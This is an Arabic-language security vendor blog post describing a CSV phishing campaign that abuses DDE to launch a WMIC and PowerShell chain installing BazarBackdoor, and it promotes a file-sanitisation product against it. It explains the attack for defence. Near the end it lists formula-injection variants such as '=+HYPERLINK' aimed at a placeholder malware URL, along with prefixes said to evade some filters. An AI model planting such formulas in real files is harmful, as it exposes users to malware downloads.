في فبراير 2022، رصد كريس كامبل، الباحث في البرمجيات الخبيثة، حملة تصيّد جديدة باستخدام ملفات نصية CSV (قيم مفصولة بفواصل) مُعدّة خصيصًا لإصابة أجهزة المستخدمين بحصان طروادة BazarBackdoor. في هذا المنشور في هذه المدونة، نحلل سيناريو الهجوم ونوضح لك كيفية منع هذا الهجوم المعقد باستخدام Deep CDR
(تعطيل المحتوى وإعادة بنائه).
تكتيك الهجوم
في حملة التصيد الاحتيالي هذه ، استخدم مجرمو الإنترنت ملف CSV - ملف نصي محدد يخزن البيانات بتنسيق جدولي ويستخدم فاصلة لفصل القيم. يعد نوع الملف هذا طريقة شائعة لتبادل البيانات البسيطة بين قواعد البيانات والتطبيقات. نظرا لأن ملف CSV يحتوي ببساطة على نص بدون رمز قابل للتنفيذ ، يعتقد الكثير من المستخدمين أنه غير ضار ويفتحون المستند بسرعة دون حذر. لا يشكون في أن الملف يمكن أن يكون ناقل تهديد يمكن من خلاله للبرامج الضارة الوصول إلى أجهزتهم إذا تم فتح ملف CSV مع التطبيقات التي تدعم تبادل البيانات الديناميكي (DDE) ، مثل Microsoft Excel و OpenOffice Calc. يمكن لهذه التطبيقات تنفيذ الصيغ والدوال في ملف CSV. يسيء مؤلفو التهديد ميزة DDE هذه لتنفيذ أوامر تعسفية ، والتي تقوم بتنزيل وتثبيت حصان طروادة BazarBackdoor ، للاختراق والوصول الكامل إلى شبكات الشركة من جهاز الضحية غير الحذر. مقارنة بأساليب الهجوم الشائعة باستخدام ماكرو ضار أو رمز VBA مخفي في ملف MS Office ، يصعب اكتشاف التهديدات المخفية داخل مستندات DDE.
بفحص الملف بعناية ، يمكننا أن نرى = WmiC | الأمر (أمر واجهة إدارة Windows) الموجود في أحد أعمدة البيانات. إذا سمح الضحايا عن غير قصد بتشغيل وظيفة DDE هذه ، فستقوم بإنشاء أمر PowerShell. ستقوم الأوامر بعد ذلك بفتح عنوان URL بعيد لتنزيل BazarLoader وسيتم تثبيت BazarBackdoor على جهاز الضحية.
كيف يساعدك Deep CDR في الدفاع عن نفسك ضد هجمات DDE
يمكنك حماية شبكتك من حملات التصيد الاحتيالي المعقدة هذه من خلال تعقيم الملفات المرفقة في رسائل البريد الإلكتروني قبل وصولها إلى المستخدمين. وبعقلية أن كل ملف يمثل تهديداً محتملاً والتركيز على الوقاية بدلاً من الاكتشاف فقط، يقوم Deep CDR بإزالة جميع المحتويات النشطة في الملفات مع الحفاظ على نفس قابلية استخدام الملفات ووظائفها. Deep CDR هي إحدى التقنيات الست الرئيسية في MetaDefender - منصة OPSWATالمتقدمة لمنع التهديدات التي تتبنى حقاً فلسفة "الثقة المعدومة".
فيما يلي تفاصيل التعقيم بعد أن قمنا بمعالجة ملف CSV المصاب باستخدام MetaDefender Core (يمكنك أيضًا الرجوع إلى نتيجةالفحص على MetaDefender Cloud). قام Deep CDR بتحييد الصيغة الموجودة في الملف بحيث لم يتم إنشاء أمر PowerShell. ومن ثم تعذر تنزيل البرمجية الخبيثة.
في هجمات مماثلة ، يستخدم مؤلفو التهديدات صيغا أكثر تعقيدا للتهرب من الكشف. عادة ، تبدأ الصيغ في MS Excel بعلامة المساواة (=). ومع ذلك ، نظرا لأن هذا التطبيق يقبل أيضا الصيغ التي تبدأ بعلامة مختلفة ، مثل "=+" أو "@" ، بدلا من "=" فقط ، يمكن أن تكون الصيغة المدمرة في ملفات CSV:
=+HYPERLINK("<malware URL>")
=-HYPERLINK("<malware URL>")
=@HYPERLINK("<malware URL>")
+@HYPERLINK("<malware URL>")
-@HYPERLINK("<malware URL>")
يمكن لهذه الأنواع من الصيغ أن تستعصي على بعض أنظمة CDR الشائعة. ومع ذلك، يمكن لموقع Deep CDR التعامل بسهولة مع هذا التكتيك وإخراج ملفات نظيفة وآمنة للاستهلاك وبالتالي تحييد التهديد.
اعرف المزيد عن Deep CDR أو تحدث إلى أحد الخبراء التقنيين في OPSWAT لاكتشاف أفضل الحلول الأمنية لحماية شبكة شركتك ومستخدميها من هجمات فورية والبرمجيات الخبيثة المتطورة المراوغة.
